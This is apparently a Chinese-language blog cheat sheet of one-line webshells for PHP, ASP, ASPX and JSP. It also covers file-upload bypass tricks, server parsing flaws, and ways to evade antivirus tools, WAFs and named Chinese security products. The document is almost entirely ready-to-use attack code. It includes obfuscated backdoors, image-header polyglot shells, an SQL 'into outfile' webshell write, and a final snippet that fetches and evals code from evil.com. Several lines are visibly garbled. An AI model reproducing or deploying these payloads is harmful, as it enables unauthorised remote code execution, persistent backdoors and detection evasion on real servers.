PHP 一句话木马
基础型
最经典的eval执行:
1
| <?php @eval($_POST['cmd']);?>
|
带错误抑制的assert执行(PHP7前可拆分):
1
| <?php @assert($_POST['cmd']);?>
|
REQUEST接收GET/POST参数:
1
| <?php @eval($_REQUEST['cmd']);?>
|
system直接执行系统命令:
1
| <?php system($_REQUEST['cmd']);?>
|
带条件判断的执行(可插入正常文件末尾):
1
| <?php if(isset($_POST['c'])){eval($_POST['c']);}?>
|
变形混淆型
动态函数调用:
1
| <?php ($_=@$_GET[1]).@$_($_POST[1])?>
|
可变函数执行(密码c和cc):
1
| <?$_POST['c']($_POST['cc']);?>
|
双参数可变函数:
1
| <?$_POST['c']($_POST['cc'],$_POST['cc'])?>
|
短标签形式:
script标签绕过(绕过<?限制):
1
| <script language="php">@eval($_POST['cmd'])</script>
|
反引号执行系统命令:
1
| <?php echo `$_GET['cmd']` ?>
|
编码变形型
字符串拼接assert:
1
| <?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["cmd"]); ?>
|
字符串替换构造:
1
| <?php $a = str_replace("x","","axsxxsxexrxxt");$a($_POST["cmd"]); ?>
|
字符串反转构造:
1
| <?php $a="TR"."Es"."sA"; $b=strtolower($a); $c=strrev($b); @$c($_POST['cmd']); ?>
|
base64解码执行:
1
| <?php $a=base64_decode("YXNzZXJ0"); @$a($_POST['cmd']); ?>
|
变量变量构造:
1
| <?php $bb="assert"; $a='bb'; $$a($_POST['cmd']);?>
|
parse_str变量解析:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
| <?php $str="a=eval";parse_str($str);$a($_POST['cmd']);?>
<?php
$func =create_function('',$_REQUEST['cmd']);
$func();
?>
<?php
$func=$_GET['func'];
$cmd=$_GET['cmd'];
$array[0]=$cmd;
$new_array=array_map($func,$array);
?>
<?php
@call_user_func(assert,$_GET['cmd']);
?>
<?php
$cmd=$_GET['cmd'];
$array[0]=$cmd;
call_user_func_array("assert",$array);
?>
<?php
$cmd=$_GET['cmd'];
$array1=array($cmd);
$func =$_GET['func'];
array_filter($array1,$func);
?>
<?php usort($_GET,'asse'.'rt');?> php环境>=<5.6才能用
<?php usort(...$_GET);?> php环境>=5.6才能用
<?php eval($_POST1);?>
<?php if(isset($_POST['c'])){eval($_POST['c']);}?>
<?php system($_REQUEST1);?>
<?php ($_=@$_GET1).@$_($_POST1)?>
<?php @eval_r($_POST1)?>
<?php assert($_POST1);?>
<?php $a = $_POST['c']; $a($_POST['cc']);?>
<?php $a = $_POST['c']; $a($_POST['cc'],$_POST['cc'])?>
<?php @preg_replace("/[email]/e",$_POST['h'],"error");?>:<O>h=@eval_r($_POST1);</O>
<?php echo `$_GET['r']` ?>
<script language="php">@eval_r($_POST[sb])</script>
<?php (])?> 上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错,比如 index.asp里面也是可以的!
<?if(isset($_POST['1'])){eval($_POST['1']);}?><?php system ($_REQUEST[1]);?>
加了判断的PHP一句话,与上面的ASP一句话相同道理,也是可以插在任何PHP文件 的最底部不会出错!
<%execute request(“class”)%><%'<% loop <%:%><%'<% loop <%:%><%execute request (“class”)%><%execute request(“class”)'<% loop <%:%>
无防下载表,有防下载表可尝试插入以下语句突破的一句话
<%eval(request(“1″)):response.end%> 备份专用
### 回调函数型
create_function创建匿名函数(PHP5/7可用):
```php
<?php $st=@create_function('',$_POST['cmd']);$st();?>
|
call_user_func回调执行:
1
| <?php @call_user_func('assert',$_GET['cmd']);?>
|
call_user_func_array回调执行:
1
| <?php call_user_func_array('assert', array($_REQUEST['cmd']));?>
|
array_map映射执行(需传func和cmd参数):
1
| <?php array_map($_GET['func'], array($_GET['cmd']));?>
|
array_filter过滤执行:
1
| <?php array_filter(array($_GET['cmd']), $_GET['func']);?>
|
usort排序回调(PHP<5.6):
1
| <?php usort($_GET,'asse'.'rt');?>
|
usort展开操作符(PHP>=5.6):
1
| <?php usort(...$_GET);?>
|
正则替换型
preg_replace的/e修饰符(仅PHP5):
1
| <?php @preg_replace('/.*/e',$_POST['cmd'],'');?>
|
preg_filter的/e修饰符(仅PHP5):
1
| <?php @preg_filter('/.*/e',$_POST['cmd'],'');?>
|
mb_ereg_replace的ee修饰符(PHP5/7通用):
1
| <?php @mb_ereg_replace('.*',$_POST['cmd'],'','ee');?>
|
mb_eregi_replace的ee修饰符:
1
| <?php @mb_eregi_replace('.*',$_POST['cmd'],'','ee');?>
|
高级绕过型
filter_var回调执行(过D盾/安全狗):
1
| <?php filter_var($_REQUEST['cmd'], FILTER_CALLBACK, array('options' => 'assert'));?>
|
filter_var_array回调:
1
| <?php filter_var_array(array('test' => $_REQUEST['cmd']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));?>
|
register_shutdown_function延迟执行(需传e参数):
1
| <?php $e = $_REQUEST['e']; register_shutdown_function($e, $_REQUEST['cmd']);?>
|
PDO SQLite回调(需传e参数):
1
2
3
4
5
6
7
| <?php
$e = $_REQUEST['e'];
$db = new PDO('sqlite:sqlite.db3');
$db->sqliteCreateFunction('myfunc', $e, 1);
$sth = $db->prepare("SELECT myfunc(:exec)");
$sth->execute(array(':exec' => $_REQUEST['cmd']));
?>
|
SQLite3直接调用(PHP5.3+):
1
2
3
4
5
6
7
8
| <?php
$e = $_REQUEST['e'];
$db = new SQLite3('sqlite.db3');
$db->createFunction('myfunc', $e);
$stmt = $db->prepare("SELECT myfunc(?)");
$stmt->bindValue(1, $_REQUEST['cmd'], SQLITE3_TEXT);
$stmt->execute();
?>
|
自定义函数包装:
1
| <?php function fun($a){ @eval($a); } @fun($_POST['cmd']); ?>
|
类封装执行(过D盾):
1
2
3
4
5
6
7
8
9
10
| <?php
class create{
public $cmd = '';
public function __construct(){
$this->cmd = $_POST['cmd'];
@eval($this->cmd);
}
}
$a = new create();
?>
|
免杀组合型
base64解码+eval(需配合菜刀配置):
1
| <?php if($_POST['x']!=''){$a="base64_decode"; eval($a($_POST['z0']));}?>
|
substr+md5验证执行:
1
| <?php substr(md5($_REQUEST['x']),28)=='6862'&&eval($_REQUEST['cmd']);?>
|
复杂混淆型(密码-7):
1
| <?php @$_="s"."s"."e"."r"; @$_="a".$_."t"; @$_(${"_P"."OS"."T"} [0-2-5]);?>
|
ASP 一句话木马
基础型
最简单的execute执行:
1
| <%execute request("cmd")%>
|
带括号的execute:
1
| <%execute(request("cmd"))%>
|
eval执行:
ExecuteGlobal全局执行:
1
| <%ExecuteGlobal request("cmd")%>
|
变形混淆型
变量赋值执行:
1
| <%a=request("cmd")%><%eval a%>
|
分离式执行(可分开插入不同位置):
1
| <%Y=request("cmd")%><%execute(Y)%>
|
条件判断执行(隐蔽性更强):
1
| <%if request("cmd")<>""then session("cmd")=request("cmd"):end if:if session("cmd")<>"" then execute session("cmd")%>
|
编码型
chr编码执行(密码p):
1
| <%eval(Request(chr(112)))%>
|
chr拼接执行(密码#):
1
| <%eval request(chr(35))%>
|
字符拼接构造:
1
| <%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("cmd"))%>
|
标签替换型
VBScript标签形式:
1
| <script language=VBScript runat=server>execute request("cmd")</script>
|
VBS标签eval:
1
| <script language=vbs runat=server>eval(request("cmd"))</script>
|
防护绕过型
过护卫神(分离标签):
1
| <%E=request("cmd")%>abc123456789<%execute E%>
|
带容错语句(可插入文件末尾):
1
| <%On Error Resume Next execute request("cmd")%>
|
条件判断防错:
1
| <%if request("cmd")<>""then execute request("cmd")%>
|
反向拼接(密码-7):
1
| <%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
|
备份专用:
1
| <%eval(request("cmd")):response.end%>
|
ASPX 一句话木马
基础型
Jscript标准执行:
1
| <%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>
|
带验证的执行:
1
| <%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["cmd"],"unsafe"));%>
|
编码混淆型
base64解码执行:
1
| <%popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0="))));%>
|
混淆型(密码-7):
1
| <%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>
|
C#型
WebAdmin后门(密码webadmin):
1
| <script language="C#" runat="server">WebAdmin2Y.x.y a=new WebAdmin2Y.x.y("add6bb58e139be10")</script>
|
JSP 一句话木马
基础执行型
Runtime执行系统命令:
1
| <%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
|
带密码验证的执行(密码023):
1
2
3
4
5
6
7
| <%if("023".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1; byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){ out.println(new String(b)); }
out.print("</pre>");
}%>
|
文件写入型
文件上传:
1
| <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
|
其他类型
MySQL写入webshell:
1
| select '<?php @eval($_POST[cmd]);?>' into outfile 'C:/Inetpub/wwwroot/1.php'
|
上传绕过技巧
前端绕过
删除或禁用JavaScript验证:
1
2
| 使用浏览器开发者工具删除onsubmit事件
或使用Burp Suite直接发包绕过前端验证
|
后缀名绕过
黑名单绕过
常见黑名单:
1
2
3
4
| php/php2/php3/php4/php5/phtml/pwml/inc
asp/aspx/ascx/jsp/cfm/cfc/pl/bat/exe/com
dll/vbs/js/reg/cgi/htaccess/.user.ini/asis
sh/shtml/shm/phtm
|
.htaccess解析漏洞
条件:Apache服务器
1
2
| AddHandler php5-script .jpg
AddType application/x-httpd-php .jpg
|
或指定文件解析:
1
2
3
| <FilesMatch "muma.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
|
.user.ini配置文件
条件:当前目录含有php文件
1
| auto_prepend_file=shell.jpg
|
00截断
条件:php<5.3.4且magic_quotes_gpc=OFF
1
| upload.php?path=uploads/shell.php%00.jpg
|
双写绕过
当服务器过滤敏感词时:
1
| shell.pphphp -> shell.php (过滤后)
|
文件内容绕过
图片马制作
GIF89a文件头:
1
2
| GIF89a
<?php eval($_POST['cmd']);?>
|
PNG文件头:
1
2
| \x89PNG\r\n\x1a\n
<?php eval($_POST['cmd']);?>
|
JPG文件头:
1
2
| \xff\xd8\xff
<?php eval($_POST['cmd']);?>
|
短标签利用
1
2
| <?= eval($_POST['cmd']); ?>
<? eval($_POST['cmd']); ?>
|
解析漏洞
Apache解析漏洞
条件:Apache 1.x/2.2.x
1
2
| test.php.a.b -> 解析为PHP
从右向左判断,不识别的后缀会继续向左
|
IIS解析漏洞
IIS6.0:
1
2
| test.asp;.jpg -> 解析为ASP
test.asp/1.jpg -> 解析为ASP
|
IIS7.0/7.5:
1
| test.jpg/.php -> 解析为PHP(需要文件存在)
|
Nginx解析漏洞
旧版本Nginx:
1
2
| test.jpg/1.php -> 解析为PHP
test.jpg%00.php -> 解析为PHP
|
MIME类型绕过
修改Content-Type:
1
2
3
| Content-Type: image/jpeg
Content-Type: image/png
Content-Type: image/gif
|
大小写绕过
Windows系统不区分大小写:
1
2
3
| shell.Php
shell.PHp
shell.pHP
|
免杀技巧
代码层面免杀
函数拆分
1
2
3
4
| <?php
$a = 'as'.'se'.'rt';
$a($_POST['cmd']);
?>
|
变量覆盖
1
2
3
4
5
| <?php
$a = 'eval';
$$a = $_POST['cmd'];
$eval();
?>
|
编码混淆
Base64编码:
1
2
3
4
| <?php
$code = base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs=');
eval($code);
?>
|
Hex编码:
1
2
3
4
| <?php
$func = "\x65\x76\x61\x6c";
$func($_POST['cmd']);
?>
|
注释混淆
1
2
3
| <?php
eval($_POST['cmd']);
?>
|
异或运算
1
2
3
4
5
6
7
| <?php
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');
$___=$$__;
$_($___[_]);
?>
|
文件层面免杀
文件包含
主文件:
1
| <?php include('config.jpg'); ?>
|
config.jpg:
1
| <?php eval($_POST['cmd']); ?>
|
分散存储
将webshell分成多个文件:
1
2
3
4
5
6
7
8
9
10
|
<?php $a = 'ev';
$b = 'al';
$c = $a.$b;
$c($_POST['cmd']);
?>
|
利用系统特性
Windows流文件:
1
2
| shell.php:stream.txt
shell.php::$DATA
|
隐藏文件
Linux隐藏文件:
WAF绕过
参数污染
1
2
3
4
5
| <?php
eval($_POST['a'].$_POST['b']);
?>
|
HTTP头利用
1
2
3
4
| <?php
eval($_SERVER['HTTP_USER_AGENT']);
?>
|
编码绕过
URL编码:
Unicode编码:
1
2
3
| <?php
$func = "\u0065\u0076\u0061\u006c";
?>
|
综合免杀示例
高度混淆的一句话:
1
2
3
4
5
6
7
8
9
10
11
12
13
| <?php
class S{
public $v;
function __construct($c){
$this->v=$c;
}
function __destruct(){
$a='e'.'v'.'a'.'l';
$a($this->v);
}
}
$s=new S($_POST['cmd']);
?>
|
利用反射:
1
2
3
4
| <?php
$r = new ReflectionFunction('assert');
$r->invoke($_POST['cmd']);
?>
|
动态加载:
1
2
3
4
| <?php
$f = file_get_contents('http://evil.com/shell.txt');
eval($f);
?>
|